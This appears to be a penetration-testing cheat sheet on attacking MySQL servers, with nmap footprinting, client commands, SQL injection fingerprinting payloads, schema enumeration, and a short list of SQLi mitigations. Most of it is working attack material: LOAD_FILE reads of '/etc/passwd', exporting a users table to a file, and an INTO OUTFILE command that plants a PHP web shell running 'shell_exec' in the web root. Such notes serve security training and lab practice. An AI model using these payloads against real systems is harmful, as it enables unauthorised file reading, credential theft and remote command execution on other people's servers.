MySQL (3306)

CVE-2012-2122 in MySQL 5.6.x

Footprinting using nmap

sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Interacting to the mysql server

without password

mysql -u root -h 10.129.14.132

with password

mysql -u root -pP4SSw0rd -h 10.129.14.128

Commands

Command

Description

mysql -u <user> -p<password> -h <IP address>

Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.

show databases;

Show all databases.

use <database>;

Select one of the existing databases.

show tables;

Show all available tables in the selected database.

show columns from <table>;

Show all columns in the selected database.

select * from <table>;

Show everything in the desired table.

select * from <table> where <column> = "<string>";

Search for needed stringin the desired table.

INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');

insert values

describe <table>

show table columns and data types

Types of SQL Injection

Footprinting

How to check if the DB is mysql

Payload
When to Use
Expected Output
Wrong Output

SELECT @@version

When we have full query output

MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1'

In MSSQL it returns MSSQL version. Error with other DBMS.

SELECT POW(1,1)

When we only have numeric output

1

Error with other DBMS

SELECT SLEEP(5)

Blind/No Output

Delays page response for 5 seconds and returns 0.

Will not delay response with other DBMS

Gettings Schema Names and Tables

schema_name from information_schema.schemata

table_name from information_schema.tables where table_schema=database()

column_name from information_schema.columns where table_name='table'

Reading Files

Getting Username

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

Getting User Privileges

SELECT super_priv FROM mysql.user
SELECT grantee, privilege_type FROM information_schema.user_privileges

Reading the file

SELECT LOAD_FILE('/etc/passwd');

Writing Files

Pre-requisites

  1. User with FILE privilege enabled

  2. MySQL global secure_file_priv variable not enabled

  3. Write access to the location we want to write to on the back-end server

Get File Privilege

SHOW VARIABLES LIKE 'secure_file_priv';
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

Note: if secure_file_priv is empty, we can write

Writing to a file

SELECT * from users INTO OUTFILE '/tmp/credentials';

Finding the base web dir

Tip: Advanced file exports utilize the 'FROM_BASE64("base64_data")' function in order to be able to write long/advanced files, including binary data.

SQLi Mitigation

  • Input Sanitization via mysqli_real_escape_string

  • Input Validation via regex for example

  • Limiting User Privileges

  • Using WAF

  • Parameterized Queries via mysqli_stmt_bind_param

Misconfigurations

  • anonymous access is enabled

  • users without password

Privileges

  • Read or change the contents of a database

  • Read or change the server configuration

  • Execute commands

  • Read local files

  • Communicate with other databases

  • Capture the local system hash

  • Impersonate existing users

  • Gain access to other networks

Protocol Specific Attacks

Code execution

not normal but can be encountered since there can be user-defined functions (c/c++) in mysql

Write Local Files

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
mysql> show variables like "secure_file_priv"; # must be empty so we can write

Reading Local Files

mysql> select LOAD_FILE("/etc/passwd");

Note: by default, this is not enabled

PreviousInteracting with EmailNextInteracting with MySQL

Last updated